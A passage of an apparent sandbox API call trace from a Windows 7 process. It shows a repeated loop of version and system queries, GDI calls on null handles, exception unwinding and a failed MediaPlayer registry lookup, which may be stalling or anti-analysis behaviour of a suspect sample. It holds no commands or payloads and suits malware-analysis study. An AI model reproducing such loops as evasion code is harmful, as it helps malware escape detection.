dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.171] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.171] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.171] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.171] BeginPath (hdc=0x0) returned 0 [0088.171] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.171] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.171] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.171] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.171] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.171] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.171] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401d6 [0088.171] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401d3 [0088.171] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa5 [0088.171] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa6 [0088.171] CombineRgn (hrgnDst=0x1040fa5, hrgnSrc1=0x170401d6, hrgnSrc2=0x190401d3, iMode=1) returned 1 [0088.171] CombineRgn (hrgnDst=0x1040fa6, hrgnSrc1=0x170401d6, hrgnSrc2=0x190401d3, iMode=4) returned 2 [0088.171] CreateSolidBrush (color=0xff) returned 0x2100fa4 [0088.171] CreateSolidBrush (color=0xff0000) returned 0x1100fa7 [0088.171] DeleteObject (ho=0x1100fa7) returned 1 [0088.171] DeleteObject (ho=0x190401d3) returned 1 [0088.171] DeleteObject (ho=0x170401d6) returned 1 [0088.171] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.171] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.171] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.171] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.171] BeginPath (hdc=0x0) returned 0 [0088.171] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.171] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.171] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.172] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.172] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.172] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.172] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1a0401d3 [0088.172] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x180401d6 [0088.172] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa8 [0088.172] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fa9 [0088.172] CombineRgn (hrgnDst=0x1040fa8, hrgnSrc1=0x1a0401d3, hrgnSrc2=0x180401d6, iMode=1) returned 1 [0088.172] CombineRgn (hrgnDst=0x1040fa9, hrgnSrc1=0x1a0401d3, hrgnSrc2=0x180401d6, iMode=4) returned 2 [0088.172] CreateSolidBrush (color=0xff) returned 0x2100fa7 [0088.172] CreateSolidBrush (color=0xff0000) returned 0x1100faa [0088.172] DeleteObject (ho=0x1100faa) returned 1 [0088.172] DeleteObject (ho=0x180401d6) returned 1 [0088.172] DeleteObject (ho=0x1a0401d3) returned 1 [0088.172] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.172] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.172] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.172] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.172] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.172] BeginPath (hdc=0x0) returned 0 [0088.172] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.172] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.172] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.172] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.172] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.172] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.172] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.172] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x190401d6 [0088.172] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1b0401d3 [0088.172] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fab [0088.172] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fac [0088.172] CombineRgn (hrgnDst=0x1040fab, hrgnSrc1=0x190401d6, hrgnSrc2=0x1b0401d3, iMode=1) returned 1 [0088.172] CombineRgn (hrgnDst=0x1040fac, hrgnSrc1=0x190401d6, hrgnSrc2=0x1b0401d3, iMode=4) returned 2 [0088.173] CreateSolidBrush (color=0xff) returned 0x2100faa [0088.173] CreateSolidBrush (color=0xff0000) returned 0x1100fad [0088.173] DeleteObject (ho=0x1100fad) returned 1 [0088.173] DeleteObject (ho=0x1b0401d3) returned 1 [0088.173] DeleteObject (ho=0x190401d6) returned 1 [0088.173] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.173] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.173] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.173] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.173] BeginPath (hdc=0x0) returned 0 [0088.173] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.173] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.173] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.173] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.173] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.173] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1c0401d3 [0088.173] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1a0401d6 [0088.173] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fae [0088.173] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040faf [0088.173] CombineRgn (hrgnDst=0x1040fae, hrgnSrc1=0x1c0401d3, hrgnSrc2=0x1a0401d6, iMode=1) returned 1 [0088.173] CombineRgn (hrgnDst=0x1040faf, hrgnSrc1=0x1c0401d3, hrgnSrc2=0x1a0401d6, iMode=4) returned 2 [0088.173] CreateSolidBrush (color=0xff) returned 0x2100fad [0088.173] CreateSolidBrush (color=0xff0000) returned 0x1100fb0 [0088.173] DeleteObject (ho=0x1100fb0) returned 1 [0088.173] DeleteObject (ho=0x1a0401d6) returned 1 [0088.173] DeleteObject (ho=0x1c0401d3) returned 1 [0088.173] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.173] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.173] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.173] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.173] BeginPath (hdc=0x0) returned 0 [0088.173] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.173] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.173] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.173] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.173] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.174] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.174] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1b0401d6 [0088.174] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1d0401d3 [0088.174] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fb1 [0088.174] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fb2 [0088.174] CombineRgn (hrgnDst=0x1040fb1, hrgnSrc1=0x1b0401d6, hrgnSrc2=0x1d0401d3, iMode=1) returned 1 [0088.174] CombineRgn (hrgnDst=0x1040fb2, hrgnSrc1=0x1b0401d6, hrgnSrc2=0x1d0401d3, iMode=4) returned 2 [0088.174] CreateSolidBrush (color=0xff) returned 0x2100fb0 [0088.174] CreateSolidBrush (color=0xff0000) returned 0x1100fb3 [0088.174] DeleteObject (ho=0x1100fb3) returned 1 [0088.174] DeleteObject (ho=0x1d0401d3) returned 1 [0088.174] DeleteObject (ho=0x1b0401d6) returned 1 [0088.174] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.174] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.174] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.174] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.174] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.174] BeginPath (hdc=0x0) returned 0 [0088.174] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.174] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.174] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.174] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.174] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.174] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.174] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.174] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1e0401d3 [0088.174] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1c0401d6 [0088.174] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fb4 [0088.174] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fb5 [0088.174] CombineRgn (hrgnDst=0x1040fb4, hrgnSrc1=0x1e0401d3, hrgnSrc2=0x1c0401d6, iMode=1) returned 1 [0088.174] CombineRgn (hrgnDst=0x1040fb5, hrgnSrc1=0x1e0401d3, hrgnSrc2=0x1c0401d6, iMode=4) returned 2 [0088.174] CreateSolidBrush (color=0xff) returned 0x2100fb3 [0088.175] CreateSolidBrush (color=0xff0000) returned 0x1100fb6 [0088.175] DeleteObject (ho=0x1100fb6) returned 1 [0088.175] DeleteObject (ho=0x1c0401d6) returned 1 [0088.175] DeleteObject (ho=0x1e0401d3) returned 1 [0088.175] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.175] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.175] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.175] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.175] BeginPath (hdc=0x0) returned 0 [0088.175] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.175] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.175] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.175] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.175] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.175] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.175] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1d0401d6 [0088.175] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1f0401d3 [0088.175] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fb7 [0088.175] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fb8 [0088.175] CombineRgn (hrgnDst=0x1040fb7, hrgnSrc1=0x1d0401d6, hrgnSrc2=0x1f0401d3, iMode=1) returned 1 [0088.175] CombineRgn (hrgnDst=0x1040fb8, hrgnSrc1=0x1d0401d6, hrgnSrc2=0x1f0401d3, iMode=4) returned 2 [0088.175] CreateSolidBrush (color=0xff) returned 0x2100fb6 [0088.175] CreateSolidBrush (color=0xff0000) returned 0x1100fb9 [0088.175] DeleteObject (ho=0x1100fb9) returned 1 [0088.175] DeleteObject (ho=0x1f0401d3) returned 1 [0088.175] DeleteObject (ho=0x1d0401d6) returned 1 [0088.175] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.175] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.175] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.175] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.175] BeginPath (hdc=0x0) returned 0 [0088.175] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.175] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.175] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.176] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.176] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.176] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x200401d3 [0088.176] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x1e0401d6 [0088.176] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fba [0088.176] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fbb [0088.176] CombineRgn (hrgnDst=0x1040fba, hrgnSrc1=0x200401d3, hrgnSrc2=0x1e0401d6, iMode=1) returned 1 [0088.176] CombineRgn (hrgnDst=0x1040fbb, hrgnSrc1=0x200401d3, hrgnSrc2=0x1e0401d6, iMode=4) returned 2 [0088.176] CreateSolidBrush (color=0xff) returned 0x2100fb9 [0088.176] CreateSolidBrush (color=0xff0000) returned 0x1100fbc [0088.176] DeleteObject (ho=0x1100fbc) returned 1 [0088.176] DeleteObject (ho=0x1e0401d6) returned 1 [0088.176] DeleteObject (ho=0x200401d3) returned 1 [0088.176] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.176] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.176] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.176] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.176] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.176] BeginPath (hdc=0x0) returned 0 [0088.176] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.176] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.176] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.176] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.176] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.176] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.176] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.176] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x1f0401d6 [0088.176] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x210401d3 [0088.176] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fbd [0088.176] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040fbe [0088.176] CombineRgn (hrgnDst=0x1040fbd, hrgnSrc1=0x1f0401d6, hrgnSrc2=0x210401d3, iMode=1) returned 1 [0088.176] CombineRgn (hrgnDst=0x1040fbe, hrgnSrc1=0x1f0401d6, hrgnSrc2=0x210401d3, iMode=4) returned 2 [0088.176] CreateSolidBrush (color=0xff) returned 0x2100fbc [0088.177] CreateSolidBrush (color=0xff0000) returned 0x1100fbf [0088.177] DeleteObject (ho=0x1100fbf) returned 1 [0088.177] DeleteObject (ho=0x210401d3) returned 1 [0088.177] DeleteObject (ho=0x1f0401d6) returned 1 [0088.177] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.177] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.177] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.177] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.177] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.177] BeginPath (hdc=0x0) returned 0 [0088.177] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.177] AngleArc 